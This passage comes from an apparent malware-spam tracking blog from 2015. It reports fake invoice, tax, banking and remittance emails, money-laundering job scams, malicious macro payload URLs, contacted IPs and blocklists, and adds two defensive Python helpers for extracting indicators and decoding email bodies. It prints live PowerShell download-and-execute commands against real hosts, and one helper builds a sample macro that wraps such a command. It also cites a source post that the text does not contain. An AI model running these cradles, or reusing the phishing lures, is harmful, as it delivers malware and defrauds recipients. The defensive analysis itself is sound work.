Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts; for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177
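The macros in this post, in the "December unpaid invoice notification" post and in the "Aspiring Solicitors" post all hide the same kind of thing: a Base64 blob that decodes to a cmd /K powershell.exe download-expand-start one-liner. The script below is an added example, not code from the original posts, that pulls such blobs out of macro source, decodes them (UTF-8, or UTF-16LE as PowerShell's own -EncodedCommand uses) and extracts the download URLs, IPs and %TEMP% drop paths as indicators. The stand-in macro built by build_sample_macro() is constructed for the example; it wraps one of the real commands quoted above in a single VBA string literal, whereas the real macros bury it in junk code.

```python
import base64
import re

# One of the commands recovered from the "Aspiring Solicitors" document above.
SAMPLE_COMMAND = (
    "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://193.26.217.199/smoozy/shake.exe','%TEMP%\\JIOiodfhioIH.cab'); "
    "expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; "
    "start %TEMP%\\JIOiodfhioIH.exe;"
)

def build_sample_macro(command, encoding="utf-8"):
    """Constructed stand-in for the obfuscated VBA: the real macros bury the
    Base64 blob in junk code; here it sits in one string literal."""
    blob = base64.b64encode(command.encode(encoding)).decode("ascii")
    return ('Sub AutoOpen()\n'
            '    Dim x As String\n'
            '    x = "' + blob + '"\n'
            '    Shell Decode64(x), vbHide\n'
            'End Sub\n')

_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long runs of Base64 alphabet
_URL = re.compile(r"https?://[^\s'\"<>]+", re.I)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_DROP = re.compile(r"%TEMP%\\[^\s'\";]+", re.I)       # files written under %TEMP%

def _as_text(raw):
    """Decode bytes as UTF-8, then UTF-16LE, accepting only printable text."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            s = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if s and all(c.isprintable() or c in "\r\n\t" for c in s):
            return s
    return None

def decode_blobs(text):
    """Return the decoded text of every long Base64 run found in `text`."""
    found = []
    for m in _B64_RUN.finditer(text):
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)      # restore stripped padding
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:                  # binascii.Error is a ValueError
            continue
        s = _as_text(raw)
        if s:
            found.append(s)
    return found

def extract_iocs(macro_text):
    """Decode embedded Base64 and pull download URLs, IPs and drop paths out of
    whatever shell/PowerShell command it hides; note tell-tale switches too."""
    iocs = {"commands": [], "urls": set(), "ips": set(), "paths": set(), "flags": set()}
    for cmd in decode_blobs(macro_text):
        iocs["commands"].append(cmd)
        iocs["urls"].update(_URL.findall(cmd))
        iocs["ips"].update(_IPV4.findall(cmd))
        iocs["paths"].update(_DROP.findall(cmd))
        low = cmd.lower()
        for flag in ("-executionpolicy bypass", "-noprofile", "downloadfile", "expand "):
            if flag in low:
                iocs["flags"].add(flag.strip())
    return iocs

if __name__ == "__main__":
    for key, val in extract_iocs(build_sample_macro(SAMPLE_COMMAND)).items():
        print(key, sorted(val) if isinstance(val, set) else val)
```

The URL and path sets are what go into a blocklist and a host-based search (the dropped .cab and .exe names under %TEMP% are a quick check on a suspect machine); the flags set is a cheap signal that the decoded text is a download cradle rather than benign encoded data.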



Friday, 6 March 2015

Fake job offer: jobinituk.com / jobsinits.com / workincroatia.com

This spammed out "job offer" is actually an attempt to recruit people into criminal money laundering.

Date:    6 March 2015 at 21:00
Subject:    Hello

Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.

We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.

Part-time employment is currently important.
We offer a wage from 3100 GBP per month.

If you are interested in our offer, mail to us your answer on andonis@jobinituk.com and
we will send you an extensive information as soon as possible.
Respectively submitted

Personnel department
There are four related domains:

jobinituk.com
jobsinits.com
workincroatia.com
sati-haus.net


If you receive a job offer soliciting replies to one of these domains, then the job offer is bogus. If you were to accept it, you could well be liable to repay the money you helped launder, or even face arrest or jail time.

UPDATE: There is a second version of the spam circulating:

Date:    9 March 2015 at 15:23
Subject:    Offer

If you have
- excellent administrative skills
- knowledge of Microsoft Office
- a keen eye for details

If you
- present yourself well
- can understand and execute instructions

If you are
- a team player with the ability to work independently
- organized
- reliable and punctual person
- determined to work hard and succeed

Then We need you in Our Advertising Company!

Please email us for details of the job: Benito@jobinituk.com


Malware spam: "Mick George Invoice 395687" / "Mick George Invoicing [mginv@mickgeorge.co.uk]"

This malformed spam is meant to have a malicious attachment:

From:    Mick George Invoicing [mginv@mickgeorge.co.uk]
Date:    6 March 2015 at 09:29
Subject:    Mick George Invoice 395687


Please find attached a copy of your invoice 395687.

If you have any queries regarding the invoice, please do not hesitate to co=
ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=
 or calling our finance department on 01480 499125.

Regards

Finance Team
MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=
1.jpg] (r)
T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk<http://www.mickgeorge.co.uk/>

Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ  [http://mickgeorges=
kips.co.uk/wp-content/uploads/2014/08/image003.jpg] <https://plus.google.co=
m/109160871896788819541/posts>    [http://mickgeorgeskips.co.uk/wp-content/=
uploads/2014/08/image004.jpg] <https://twitter.com/mickgeorgeltd>

Specialists in Earthworks * Aggregates * Skip Hire * Contaminated Land Serv=
ices & Remediation * Demolition * Contracting

Waste Management & Recycling * Landfill & Tipping Facilities * Asbestos Rem=
oval * Ready Mix Concrete & Floor Screeds

[Concrete signature]<http://mickgeorgeskips.co.uk/wp-content/uploads/2014/0=
8/Concrete-signature.jpg>

Disclaimer

This email and any attachments are intended only for the use of the individ=
ual or entity to which it is directed and may contain information that is p=
rivileged, confidential and exempt from disclosure under applicable law.

If you have received this email and you are not the intended recipient or t=
he employee or agent responsible for delivering this email to the intended =
recipient, please inform Mick George on +44 (0)1480 498099 and then delete =
the email from your system. If you are not a named addressee you must not u=
se, disclose, disseminate, distribute, copy, print or reply to this email.

Although Mick George Ltd routinely screens for viruses, addressees should s=
can this email and any attachments for viruses. Mick George Ltd makes no re=
presentation or warranty as to the absence of viruses in this email or any =
attachments. Please note for the protection of our clients and business, we=
 may monitor and read emails sent to and from our server(s).

Mick George Ltd
Something has gone wrong with the formatting; it is meant to look like this:
Please find attached a copy of your invoice 395687.
If you have any queries regarding the invoice, please do not hesitate to contact us by emailing mginv@mickgeorge.co.uk or calling our finance department on 01480 499125.
Regards
Finance Team
MICK GEORGE ®

T: 01480 499125
F: 01480 498077
www.mickgeorge.co.uk

Lancaster House, Meadow Lane, St Ives, Cambs, PE27 4YQ
Specialists in Earthworks • Aggregates • Skip Hire • Contaminated Land Services & Remediation • Demolition • Contracting
Waste Management & Recycling • Landfill & Tipping Facilities • Asbestos Removal • Ready Mix Concrete & Floor Screeds
Concrete signature
Disclaimer
This email and any attachments are intended only for the use of the individual or entity to which it is directed and may contain information that is privileged, confidential and exempt from disclosure under applicable law.
If you have received this email and you are not the intended recipient or the employee or agent responsible for delivering this email to the intended recipient, please inform Mick George on +44 (0)1480 498099 and then delete the email from your system. If you are not a named addressee you must not use, disclose, disseminate, distribute, copy, print or reply to this email.
Although Mick George Ltd routinely screens for viruses, addressees should scan this email and any attachments for viruses. Mick George Ltd makes no representation or warranty as to the absence of viruses in this email or any attachments. Please note for the protection of our clients and business, we may monitor and read emails sent to and from our server(s).
Mick George Ltd
Registered no. 2417831 (England)

The email looks like a genuine email because it has been copied from a genuine email from this company, but Mick George Skips are not actually sending this out. Instead it is a simple forgery.
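The `=` at the end of each wrapped line and the `<mailto:…>` / `[http://…]` fragments are, on my reading (an assumption, not something stated above), quoted-printable soft line breaks and HTML-to-text residue lifted from the raw source of the genuine message and re-sent without the matching Content-Transfer-Encoding header. As an added example (not from the post), this Python snippet decodes a constructed excerpt of the malformed body back into the intended text and counts the undecoded soft breaks, which make a handy forgery tell; the function names are mine.

```python
import quopri
import re

# Constructed excerpt of the body exactly as it arrived (copied from the spam quoted above).
RAW_BODY = (
    "If you have any queries regarding the invoice, please do not hesitate to co=\n"
    "ntact us by emailing mginv@mickgeorge.co.uk<mailto:mginv@mickegeorge.co.uk>=\n"
    " or calling our finance department on 01480 499125.\n"
    "\n"
    "MICK GEORGE[http://mickgeorgeskips.co.uk/wp-content/uploads/2014/08/image00=\n"
    "1.jpg] (r)\n"
)

# Left-overs of an HTML-to-text conversion: <mailto:...>/<http...> link targets and
# [http://...] image placeholders sitting next to the text they decorated.
HTML_RESIDUE_RE = re.compile(r"<(?:mailto:|https?://)[^>]*>|\[https?://[^\]]*\]")

def decode_qp_body(raw):
    """Undo quoted-printable encoding: '=' at end of line is a soft break, =XX an escaped byte."""
    return quopri.decodestring(raw.encode("ascii")).decode("utf-8", errors="replace")

def strip_html_residue(text):
    """Remove the link targets and image placeholders the text conversion left behind."""
    return HTML_RESIDUE_RE.sub("", text)

def reconstruct_body(raw):
    """What the recipient would have seen had the message been encoded correctly."""
    return strip_html_residue(decode_qp_body(raw))

def soft_break_count(raw):
    """Number of quoted-printable soft line breaks still visible in the displayed body;
    a non-zero count means the text was pasted from a raw message rather than composed."""
    return sum(1 for line in raw.splitlines() if line.endswith("="))

if __name__ == "__main__":
    print("visible soft breaks:", soft_break_count(RAW_BODY))
    print(reconstruct_body(RAW_BODY))
```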

What you are meant to have attached is a Word document Invoice395687.DOC which comes in several varieties, but they all contain a malicious macro similar to this which (in this case) downloads a component from http://schlaghaufer.de/js/bin.exe.

This malware and the payload it drops is identical to the one found in this fake IRS spam run earlier today.

Malware spam: "Your 2015 Electronic IP Pin!" / "Internal Revenue Service [refund.noreply@irs.gov]"

This fake IRS email comes with a malicious attachment.

From:    Internal Revenue Service [refund.noreply@irs.gov]
Date:    6 March 2015 at 08:48
Subject:    Your 2015 Electronic IP Pin!

Dear Member

This is to inform you that our system has generated your new secured Electronic PIN to e-file your 2014 tax return.

Please kindly download the microsoft file to securely review it.

Thanks

Internal Revenue Service
915 Second Avenue, MS W180

So far I have only seen a single sample of this with an attachment TaxReport(IP_PIN).doc - although there are usually several different versions. Currently this is undetected by AV vendors. This contains a malicious macro [pastebin] which downloads a component from the following location:

http://chihoiphunumos.ru/js/bin.exe

There are probably other download locations, but the payload will be the same. This is saved as %TEMP%\324235235.exe and has a detection rate of 1/55. Automated analysis tools [1] [2] show attempted connections to:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)

According to the Malwr report this executable drops another version of itself [VT 1/56] and a malicious DLL [VT 2/56].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24
104.232.32.119
87.236.215.103

Malware spam: "Your online Gateway.gov.uk Submission"

This fake Government spam leads to malware.

From:    Gateway.gov.uk
Date:    6 March 2015 at 11:49
Subject:    Your online Gateway.gov.uk Submission

Government Gateway logo

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.
gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information

The link in the email leads to a download at cubbyusercontent.com and the payload is the same as this NatWest spam run also active today.

Malware spam: "You have received a new secure message from BankLine" / "Bankline [secure.message@business.natwest.com]"

This fake banking spam leads to malware.

From:    Bankline [secure.message@business.natwest.com]
Date:    6 March 2015 at 10:36
Subject:    You have received a new secure message from BankLine

You have received a secure message.

Your Documents have been uploaded to Cubby cloud storage.
Cubby cloud storage  is a cloud data service powered by LogMeIn, Inc.

Read your secure message by following the link bellow:

https://www.cubbyusercontent.com/pl/Business%20Secure%20Message.zip/_90ad04a3965340b195b8be98c6a6ae37


----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.

If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 8719.

First time users - will need to register after opening the attachment.
About Email Encryption - https://help.business.natwest.com/support/app/answers/detail/a_id/1671/kw/secure%20message 
This downloads a ZIP file from cubbyusercontent.com which contains a malicious executable Business Secure Message.exe which has a VirusTotal detection rate of just 1/57.

Automated analysis tools [1] [2] [3] [4] show attempted connections to the following URLs:

http://all-about-weightloss.org/wp-includes/images/vikun.png
http://bestcoveragefoundation.com/wp-includes/images/vikun.png
http://190.111.9.129:14248/0603no11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
http://190.111.9.129:14249/0603no11/HOME/41/7/4/


It also appears that there is an attempted connection to 212.56.214.203.

Of all of these IPs, 190.111.9.129 (Navega.com, Guatemala) is the most critical to block. It is also a characteristic of this malware (Upatre/Dyre) that it connects to checkip.dyndns.org to work out the IP address of the infected machine; it is worth checking for traffic to this domain.

The Malwr report shows several dropped files, including fyuTTs27.exe which has a VirusTotal detection rate of 4/57.


Thursday, 5 March 2015

Malware spam: "Credit Control [cc@pentafoods.com]"/ "Penta invoice I0026098"

This spam email does not come from Penta Foods, instead it is a simple forgery with a malicious attachment.

From:    Credit Control [cc@pentafoods.com]
Date:    5 March 2015 at 11:10
Subject:    Penta invoice I0026098

Please find attached your invoice I0026098

Regards,

Finance Team
Attached is a document I0026098.doc which comes in at least two versions with low detection rates [1] [2]; these contain macros [1] [2] that attempt to download a component from the following locations:

http://maloja.se/js/bin.exe
http://campusnut.com/js/bin.exe

This is the same payload as used in this earlier spam run. It currently has a VirusTotal detection rate of 12/56.


Malware spam: "Bobby Drell [rob@abbottpainting.com]" / "Brochure2.doc"

This spam does not come from Bobby Drell or Abbott Painting, instead it is a simple forgery with a malicious attachment.

From:    Bobby Drell [rob@abbottpainting.com]
Date:    5 March 2015 at 10:27
Subject:    Brochure2.doc

Please change the year to 2015.
Please confirm receipt
Thanks
Bobby Drell
Attached is a file Brochure2.doc with a low detection rate; it contains this malicious macro [pastebin] which downloads a component from the following location:

http://data.gmsllp.com/js/bin.exe

This is saved as %TEMP%\324235235.exe. Note that there may be different versions of this document that download files from different locations, but the payload should be identical. In this case the executable has a detection rate of 4/57.

Automated analysis tools [1] [2] show it phoning home to the following IPs:

92.63.87.13 (MWTV, Latvia)
95.163.121.200 (Digital Networks aka DINETHOSTING, Russia)

Usually this will drop a malicious Dridex DLL, although I was not able to obtain a sample.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
95.163.121.0/24


Wednesday, 4 March 2015

"Remittance advice" spam has a mystery XML attachment

I haven't worked this out yet, but this appears to be a malware spam run using an XML document that contains an ActiveX element.

From:    Trudy Trevino
Date:    4 March 2015 at 09:29
Subject:    Remittance advice [Rem_0559ZX.xml]

Good morning

You can find remittance advice [Rem_0559ZX.xml] in the attachment

Kind Regards
Trudy Trevino
ROSNEFT OJSC
Other example fake senders are:
Georgette Whitfield
DELTEX MEDICAL GROUP

Jasmine Hansen
ACER INC

Jodi Cooper
JOHNSON SERVICE GROUP PLC

Rebekah Dodson
VICTREX

Edmund Molina
600 GROUP

Callie Brewer
BIOQUELL

Harriett Ferguson
BRISTOL & WEST PLC

Gabrielle Alvarado
JPMORGAN US SMALLER CO INV TST PLC

The name of the XML file in the attachment (and also the body text and subject) varies but is always in the format Rem_1234AB.xml. So far I have seen three different versions (clicking the MD5 leads to a Pastebin with the XML attachment):
The XML attachment contains a Base64-encoded section which starts with the string "ActiveMime", which indicates that it is some sort of ActiveX element. I haven't been able to deduce the purpose of this, and the Malwr report is inconclusive but does show a command prompt being opened. The payload is most likely the Dridex banking trojan, given the other characteristics of the spam.

There's probably little reason to accept XML documents by email. Blocking these at your email gateway might be a good idea.

UPDATE 1

An analysis from another party indicates the following download locations:

http://92.63.87.12:8080/azvxjdfr31k/abs5ajsu.exe
http://178.32.184.11:8080/azvxjdfr31k/abs5ajsu.exe
http://46.30.42.90:8080/azvxjdfr31k/abs5ajsu.exe

The following are the servers the malware phones home to, I recommend blocking them:

62.76.176.203
46.30.42.171
74.208.68.243
37.139.47.111

More analysis to follow...

Malware spam: "John Donald [john@kingfishermanagement.uk.com]" / "Document1"

This rather terse email comes with a malicious attachment:

From:    John Donald [john@kingfishermanagement.uk.com]
Date:    4 March 2015 at 09:09
Subject:    Document1
There is no body text, but there is an attachment Document1.doc which is not currently detected by AV vendors; in turn it contains this malicious macro [pastebin] which downloads another component from the following location:

http://retro-moto.cba.pl/js/bin.exe

Note that there may be other different versions of this document with different download locations, but it should be an identical binary that is downloaded. This file is saved as %TEMP%\GHjkdjfgjkGKJ.exe and has a VirusTotal detection rate of 2/57.

Automated analysis tools [1] [2] show attempted network traffic to the following IPs:

92.63.87.13 (MWTV, Latvia)
104.232.32.119 (Net3, US)
87.236.215.103 (OneGbits, Lithuania)
108.61.198.33 (Gameservers.com / Choopa LLC, Netherlands)

According to the Malwr report it also drops another version of itself with a detection rate of just 1/57 plus a DLL with a detection rate of 7/56.

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
104.232.32.119
87.236.215.103
108.61.198.33

Sunday, 1 March 2015

Fake job offer: "ukhomejob.com" and many others

This spam email for a fake (and illegal) job is soliciting replies to ukhomejob.com. It is part of a network of fraudulent domains, attempting to recruit victims into money laundering and other illegal activities.

From:    Victim
To:    Victim
Date:    1 March 2015 at 22:09
Subject:    Advice

Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.

Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.

We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.

Part-time employment is currently important.
We offer a wage from 3500 GBP per month.

If you are interested in our offer, mail to us your answer on hermie@ukhomejob.com and
we will send you an extensive information as soon as possible.
Respectively submitted

Personnel department

This is related to this scam. Now though the IP used to receive emails is a Comcast IP of 98.221.25.74. The following domains are also related and are all fraudulent:

globbalpresence.com
recognizettrauma.net
gbearn.com
comercioes.com
eurohomejob.com
fastestrades.com
usaearns.com
idhomejob.com
ukhomejob.com
eurhomejob.com


The most likely "job" is money laundering, typically moving money out of stolen bank accounts and then passing it on to someone in Eastern Europe. This activity is illegal, and there is a chance that you'll end up in jail at worst, or having to repay the stolen money at best. Avoid.